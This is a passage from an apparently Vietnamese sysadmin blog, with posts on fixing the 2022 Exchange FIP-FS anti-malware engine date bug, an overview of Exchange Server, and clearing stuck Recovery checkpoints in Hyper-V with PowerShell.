WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
NVPSRVEX01 Removing Microsoft engine folder...
NVPSRVEX01 Emptying metadata folder...
NVPSRVEX01 Starting services...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to start...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to start...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to start...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to start...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to start...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to start...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to start...
WARNING: Waiting for service 'Microsoft Exchange Transport (MSExchangeTransport)' to start...
WARNING: Waiting for service 'Microsoft Exchange Transport (MSExchangeTransport)' to start...
WARNING: Waiting for service 'Microsoft Exchange Transport (MSExchangeTransport)' to start...
NVPSRVEX01 Starting engine update...
Running as VIETTECHGROUP\Administrator.
--------
Connecting to NVPSRVEX01.viettechgroup.lab.
Dispatched remote command. Start-EngineUpdate -UpdatePath http://amupdatedl.microsoft.com/server/amupdate

Quá trình update diễn ra trong thời gian 15-30 phút tùy hệ thống mạng. Bằng cách kiểm tra bằng lệnh này:

Add-PSSnapin Microsoft.Forefront.Filtering.Management.Powershell.
Get-EngineUpdateInformation

Đảm bảo rằng phiên bản là 2112330001 và kiểm tra trong event viewer không có lỗi nhé

Cách 2: Cập nhật manual

Xóa thư mục tồn tại engine và metadata

1. Stop the Microsoft Filtering Management service. 
2. Dùng task Manager đảm bảo updateservice.exe đã stop
3. Xóa thư mục Microsoft theo đường dẫn: %ProgramFiles%\Microsoft\Exchange Server\V15\FIP-FS\Data\Engines\amd64\Microsoft.
4. Xóa file trong thư mục metadata theo đường dẫn : %ProgramFiles%\Microsoft\Exchange Server\V15\FIP-FS\Data\Engines\metadata.

Cập nhật engine mới nhất

1. Start dịch vụ Microsoft Filtering Management service và the Microsoft Exchange Transport service.
2. Mở EMS, navigate to the Scripts folder (%ProgramFiles%\Microsoft\Exchange Server\V15\Scripts), and run Update-MalwareFilteringServer.ps1 <server FQDN>

Kiểm tra phiên bản

1. EMS chạy Add-PSSnapin Microsoft.Forefront.Filtering.Management.Powershell.
2. Run Get-EngineUpdateInformation và xác nhận UpdateVersion information is 2112330001.

Nguồn Microsoft teams Exchange

Phương Nguyễn dịch edit

Thông báo lỗi quan trọng hệ thống email Exchange Server “Message deferred by categorizer agent, FIP-FS” Disable AntiMalwareScanning

Microsoft_Exchange_(2019-present).svg

Mô tả lỗi

Anh em nào đang sử dụng lưu ý nhé. Đầu năm 2022 đúng ngày năm mới. Microsoft Exchange Vừa ra MSFTExchange đã ra bản cập nhật #msantimalware dành cho Exchange Anti-malware. Bản cập nhật này sẽ gây lỗi không gửi/nhận email. Nguyên nhân liên quan đến Y2K2 không convert chuổi số.
Tất cả emails sẽ bị treo ở hàng đợi (submission queue) với mã lỗi
“Message deferred by categorizer agent” hoặc mã lỗi event id: 5300 The FIP-FS “Microsoft” Scan Engine failed to load. PID: 14908, Error Code: 0x80004005. Error Description: Can’t convert “2201010003” to long.
with #Exchange2016 & #Exchange2019.

Nguyên Nhân

FIP-FS sử dụng kiểu “Int32” để lưu giá trị của các biến số thời gian. Giá trị tối đa mà kiểu này có thể lưu là “2.147.483.647”.

Tuy nhiên, các ngày trong năm 2022 có giá trị tối thiểu là 2.201.010.001 hoặc lớn hơn giá trị tối đa có thể được lưu trữ trong biến int32 đã ký, khiến FIP-FS “Microsoft” Scan Engine  thất bại và không phát hành thư để gửi nên bị giữ.

Kiểm tra mail queue bằng lệnh

Get-Queue -Identity submission

Các xử lý


Cách xử lý: tạm thời disable hoặc bypass Antimalware của Exchange. Mở Powershell chạy các lệnh bên dưới:

cd $ExScripts
.\Disable-AntiMalwareScanning.ps1
Set-MalwareFilteringServer -BypassFiltering $True -identity <ServerMBX>
Restart-Service MSExchangeTransport
[PS] C:\Program Files\Microsoft\Exchange Server\V15\scripts>.\Disable-AntiMalwareScanning.ps1
WARNING: The following service restart is required for the change(s) to take effect : MSExchangeTransport
Anti-malware scanning is successfully disabled. Please restart MSExchangeTransport for the changes to take effect.


Chờ Microsoft cập nhật bản vá lỗi.
Hôm nay đã bị và gặp anh em nào quản trị xem xét xử lý nhé.
Thân chào
Chúc mừng năm mới 2022

Phương Nguyễn

Microsoft Exchange Server là gì? Toàn diện về giải pháp quản lý email hàng đầu từ Microsoft

Microsoft_Exchange_(2019-present).svg

Exchange Server được nâng cấp theo thời gian và hiện là một trong những giải pháp quan trọng thuộc bộ ứng dụng đám mây của Microsoft. Microsoft đã thiết kế Exchange Server để cung cấp cho người dùng quyền truy cập vào nền tảng nhắn tin từ thiết bị di động, máy tính để bàn và hệ thống dựa trên web.

Cùng tìm hiểu ý nghĩa và vai trò của Exchange Server đối với hoạt động của doanh nghiệp khi chuyển sang lưu trữ và email đám mây của Microsoft.

1. Microsoft Exchange Server là gì?

Microsoft Exchange Server là hệ thống máy chủ ảo giúp các doanh nghiệp quản lý email, lịch, danh bạ và hỗ trợ người dùng thông qua máy tính để bàn, điện thoại di động và trình duyệt web.

Để đơn giản hóa định nghĩa thì, để có thể sử dụng được email trên Outlook hay Exchange Online, Microsoft Exchange Server phải hoạt động. Microsoft Exchange Server như “cơ quan đầu não” và Outlook hay Exchange Online là nguồn trung gian phân phối dữ liệu đến bạn.

Exchange Server chủ yếu sử dụng một giao thức độc quyền được gọi là MAPI để nói chuyện với các ứng dụng email, nhưng sau đó đã thêm hỗ trợ cho POP3 , IMAP và EAS. Giao thức SMTP tiêu chuẩn được sử dụng để giao tiếp với các máy chủ thư Internet khác.

Exchange Server được cấp phép cả phần mềm tại chỗ và phần mềm dưới dạng dịch vụ (SaaS).

2. Exchange Server hoạt động như thế nào?

Exchange Server được doanh nghiệp sử dụng chủ yếu cho việc quản lý gửi, nhận và lưu trữ email. Ngoài ra, Exchange Server còn cung cấp một số tính năng cộng tác khác như tạo lịch và tích hợp chặt chẽ với các ứng dụng Microsoft Office khác.

Một máy chủ Exchange có 4 thành phần chính hoạt động song song để quá trình hoạt động trơn tru, bao gồm:

 1. Information Store: là kho lưu trữ thông tin, nơi định vị và tổ chức các email
 2. System Attendant: Hệ thống phục vụ có chức năng tạo và quản lý địa chỉ email.
 3. SMTP: Là giao thức truyền mail đơn giản. Đây là thành phần quan trọng cho phép truyền thông điệp liên máy chủ. Thông thường, các thư phải được chuyển tiếp từ máy chủ này sang máy chủ khác, đặc biệt trong các trường hợp vị trí của máy khách người nhận ở xa hoặc đang sử dụng một nhà cung cấp email khác không phải Microsoft.
 4. Active Directory: có nhiệm vụ cập nhật thông tin hộp thư mới cho System Attendant. Nó cũng tự quản lý tài khoản người dùng và danh sách phân phối.

Khi đã thiết lập một máy chủ Exchange, bạn cần tạo tài khoản email cho từng người dùng để gửi hoặc nhận mail thông qua máy chủ. Mỗi tài khoản email phải được định cấu hình riêng với phân quyền riêng và mức độ kiểm soát của người dùng hoặc của tổ chức với email của người dùng.

Khi đã thiết lập người dùng, Quản trị viên phải thiết lập các tùy chọn lọc. Exchange Server cung cấp các tùy chọn chặn và lọc thư rác mạnh mẽ để bảo vệ người dùng khỏi thư rác, virus và các email không mong muốn khác. Các tin nhắn đến có thể bị chặn bằng tài khoản IP nhằm chặn một đối tượng cụ thể.

Exchange Server cũng có thể chặn tin nhắn đến của người nhận, phù hợp với các email được chỉ định chỉ được gửi mà không được nhận theo chính sách của tổ chức.

Khi email được Exchange Server duyệt và thông qua, chúng mới được gửi đến người nhận phù hợp. 

2. Exchange Server dành cho ai?

Microsoft Exchange Server là công cụ dành cho quản trị viên CNTT để giúp họ giám sát mọi hoạt động của người dùng thông qua kết nối email. Exchange được sử dụng rộng rãi với Outlook. Quản trị viên hệ thống có thể dễ dàng theo dõi tất cả các email đến và đi vì mục đích chất lượng và bảo mật. Exchange và Outlook và bộ “vũ khí” giúp doanh nghiệp sử dụng email hiệu quả và an toàn.

3. Các tính năng của Exchange Server 2019 mới nhất

Các tính năng bổ sung trong máy chủ Exchange 2019 bao gồm:

 • Cung cấp hỗ trợ lên đến 256Gb bộ nhớ và 48 lõi CPU
 • Cho phép cài đặt trên Window Server Core
 • Cho phép các truy cập bên ngoài vào trung tâm quản trị Exchange (EAC) và Exchange Management Shell.
 • Sử dụng phân bổ bộ nhớ đệm đồng bộ nhớ để tối ưu việc sử dụng bộ nhớ cho cơ sở dữ liệu hoạt động
 • Ngăn chặn người tham dự chuyển tiếp lời mời họp
 • Cung cấp cho người dùng các tùy chọn vắng mặt bổ sung

Xem chi tiết từ tài liệu của Microsoft: https://docs.microsoft.com/en-us/Exchange/new-features/new-features?view=exchserver-2019

4. Ưu và nhược điểm của Exchange Server

Exchange Server có thể xem là máy chủ email chất lượng nhất hiện nay. Nó không chỉ là sản phẩm đến từ gã khổng lồ công nghệ Microsoft mà còn bởi khả năng cung ứng cho hàng tỷ người dùng toàn cầu với độ chính xác và tính linh hoạt cao. Có rất ít đối thủ cạnh tranh thực sự với Exchange.

Nhưng không phải là không có nhược điểm. Cùng phân tích một số ưu nhược điểm của Exchange Server:

4.1 Ưu điểm:

Bảo mật cao: Exchange là một công cụ tuyệt vời cho mục đích bảo mật. Mối quan tâm chính của Exchange là giữ bảo mật cho dữ liệu của tổ chức và chắc chắn Exchange Server sẽ là “quán quân” trong nhiệm vụ này. 

Công ty không cần lo lắng về việc rò rỉ dữ liệu bí mật vì Exchange được trang bị các công cụ chống rò rỉ, lưu trữ và sao lưu thông tin nhạy cảm của doanh nghiệp dựa trên nghĩa vụ tuân thủ chính sách và quy định của chính phủ và ngành.

Nâng cao năng suất làm việc nhóm: Exchange Server giúp mọi người trong tổ chức của bạn luôn duy trì kết nối và cộng tác hiệu quả từ mọi nơi ngay cả khi offline. Exchange Server giúp đơn giản hóa các phương pháp giao tiếp từ xa, giảm thiểu cách kết nối truyền thống, từ đó giúp tăng trưởng năng suất nhanh chóng.

Hiệu quả về chi phí: Nhờ tính linh hoạt và thời gian hoạt động liền mạch với máy chủ mạnh mẽ, Exchange giúp giảm thiểu thời gian chết, thời gian khắc phục sự cố thường thấy ở máy chủ email truyền thống. Các tùy chọn gọi thoại, họp video, gửi tài liệu cũng dễ dàng hơn khi có Exchange. 

Nhìn chung, Exchange Server giúp doanh nghiệp tiết kiệm ngân sách khá lớn so với các máy chủ email truyền thống.

Tính di động: Máy chủ Exchange cho phép người dùng của doanh nghiệp truy cập an toàn vào các tin nhắn email, tin nhắn tức thì, thư thoại, cuộc gọi video và tin nhắn SMS từ mọi nơi trên thế giới. Tất cả những gì họ cần là một thiết bị như laptop, máy tính bàn, máy tính bảng hoặc điện thoại di động và kết nối internet.

Mở rộng lên đám mây: Exchange của Microsoft được quản lý trên đám mây nên người dùng cũng có thể mở rộng thêm nhiều ứng dụng kết nối khác trên đám mây của Microsoft hoặc ứng dụng của nhà cung cấp khác (mà Microsoft có hỗ trợ). Doanh nghiệp vừa có thể triển khai Exchange tại chỗ hoặc Exchange trên đám mây miễn là đáp ứng được nhu cầu kinh doanh của bạn.

Kết nối sâu với khách hàng: Với khả năng hoạt động liên tục 24/7/365 ngày, Exchange Server cho phép các công ty nhận thông tin và phản hồi nhanh chóng mọi yêu cầu và thắc mắc từ khách hàng. Nhanh chóng giải quyết các vấn đề sớm nhất có thể, giúp khách hàng thỏa mãn hơn trong thời gian ngắn.

4.2 Nhược điểm:

Chi phí: So với một số máy chủ email khác, triển khai, vận hành và duy trì Exchange Server khá tốn kém. Các doanh nghiệp nhỏ thường không đủ khả năng cả về chi phí lẫn nhân lực để duy trì Exchange Server lâu dài.

Nâng cấp phức tạp: Nhìn chung, nâng cấp Exchange Server không phải là nhiệm vụ dễ dàng ngay cả với những chuyên gia công nghệ giỏi nhất.

Khả năng vận hành: Để hệ thống luôn hoạt động, doanh nghiệp cần một đội ngũ CNTT giàu chuyên môn quản lý và vận hành Exchange liên tục.

Chính vì những khó khăn này mà đa số doanh nghiệp đều chọn sử dụng Exchange Server dưới dạng dịch vụ trong giải pháp Microsoft 365. Tổ chức chỉ cần bỏ chi phí mua giấy phép, mọi vấn đề còn lại sẽ do Microsoft giải quyết.

5. Exchange Server cung cấp dưới dạng dịch vụ SaaS

Sự phức tạp của việc quản lý máy chủ Exchange – cụ thể là chạy cả một hoặc nhiều máy chủ Exchange (với các doanh nghiệp lớn), cộng với các máy chủ đồng bộ hóa Active Directory – đã khiến các tổ chức chọn cách mua dưới dạng dịch vụ để tiết kiệm chi phí và dễ quản lý hơn.

6. Phân biệt Exchange Server và Exchange Online

Exchange Online là Exchange Server được phân phối dưới dạng dịch vụ đám mây do chính Microsoft lưu trữ nhằm giúp các doanh nghiệp dễ dàng sử dụng và tiết kiệm chi phí hơn thay vì đầu tư máy chủ Exchange tại chỗ.

Exchange Online cũng được xây dựng dựa trên các công nghệ tương tự như Exchange Server và cung cấp các dịch vụ cơ bản giống như các nhà cung cấp bên thứ ba lưu trữ các phiên bản máy chủ Exchange.

Kết Luận

Các khái niệm về Microsoft Exchange, Exchange Server hay Exchange Online dễ nhầm lẫn, dẫn đến việc nghiên cứu và lựa chọn dịch vụ nào theo đúng nhu cầu cũng gây khó khăn, nhất là doanh nghiệp chưa có người phụ trách mảng CNTT.

Nguồn Microsoft365

Cách Remove Checkpoint Snaphots Trong Hyper-V Trạng Thái Recovery

Ngữ cảnh

Đối với VM trong hyper-v tạo và xóa checkpoint là chuyện bình thường. Tuy nhiên vì lý do nào đó chúng ta sử dụng phần mềm Backup Veritas hoặc Veeam backup mà bị failed giữa chừng thì máy ảo trạng thái có vết checkpoint hay snapshot trong Hyper-v mà không thể xóa/merge được trên giao diện. Về bản chất xóa checkpoint gọi là merge disk vhdx.

Giải quyết

Chúng ta dùng lệnh kiểm tra máy ảo trạng thái recoverysnaphot nhé.

Lệnh kiểm tra các máy ảo trên HOST

Get-VMSnapshot -VMName 'VM' -ComputerName 'HOST'

Xóa checkpoint (Snapshot) mà không thể thực hiện trên giao diện Hyper-V manager, Bởi lý do phần mềm thứ 3 như Veeam hay vertias đã dùng cơ chế snapshot để backup sau khi backup sẽ tự động xóa checkpoint như bị cúp điện hay lỗi không thể rollback đôi khi hỏng luôn VM. Cho nên máy ảo sẽ trạng thái snapshotType là Recovery.

Get-VMSnapshot -VMName 'VM' -ComputerName 'HOST' -SnapshotType Recovery

Cho nên để xóa checkpoint chúng ta phải clear bằng tay nhé bằng lệnh bên dưới:

Get-VMSnapshot -VMName 'VM' -ComputerName 'HOST' -SnapshotType Recovery | Remove-VMSnapshot

Sau khi run bằng lệnh chúng ta thấy quá trình xóa checkpoint đang thực hiện trên giao diện

Như vậy thì Phương Nguyễn Chia sẽ xong cách xóa hay merge 1 snapshot hay checkpoint dạng bị treo hoặc đang chạy backup bị lỗi.

Nếu cảm thấy bài viết hay hãy nhớ like share

Phương Nguyễn

Chúc bạn thành công